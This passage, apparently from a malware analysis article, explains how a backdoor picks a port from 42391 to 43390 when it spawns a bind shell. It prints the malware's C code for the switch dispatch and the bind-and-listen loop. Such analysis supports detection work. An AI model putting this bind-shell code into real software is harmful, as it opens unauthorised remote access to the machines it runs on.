class="p">(</span><span class="n">scli</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="n">mon</span><span class="p">(</span><span class="n">bip</span><span class="p">,</span> <span class="n">mp</span><span class="o">-&gt;</span><span class="n">port</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Port Range </h3> <p>When spawning a bind shell, the malware selects a random port within the range <strong>42391</strong> to <strong>43390</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="k">for</span> <span class="p">(</span><span class="n">port</span> <span class="o">=</span> <span class="mi">42391</span><span class="p">;</span> <span class="n">port</span> <span class="o">&lt;</span> <span class="mi">43391</span><span class="p">;</span> <span class="n">port</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// 42391 - 43390</span> <span class="n">my_addr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span> <span class="n">bind</span><span class="p">(</span><span class="n">sock_fd</span><span class="p">,(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">my_addr</span><span class="p">,</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="p">){</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span> <span class="n">listen</span><span class="p">(</span><span class="n">sock_fd</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">p</span> <span class="o">=</span> <span class="n">port</span><span class="p">;</span> <span class="k">return</span> <span class="n">sock_fd</span><span class="p">;</span> <span class="p">}</span> <span class="n">close</span><span class="p">(</span><span class="n">sock_fd</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> </code></pre> </div> analytics c